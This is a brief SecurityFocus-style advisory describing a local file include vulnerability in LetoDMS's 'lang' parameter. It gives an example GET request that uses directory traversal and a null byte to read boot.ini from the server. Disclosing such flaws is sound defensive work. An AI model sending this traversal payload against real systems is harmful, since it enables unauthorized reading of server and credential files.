LetoDMS 'lang' Parameter Local File Include Vulnerability

An attacker can exploit this issue via a browser.

The following example HTTP request is available:

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1


 

Privacy Statement
Copyright 2010, SecurityFocus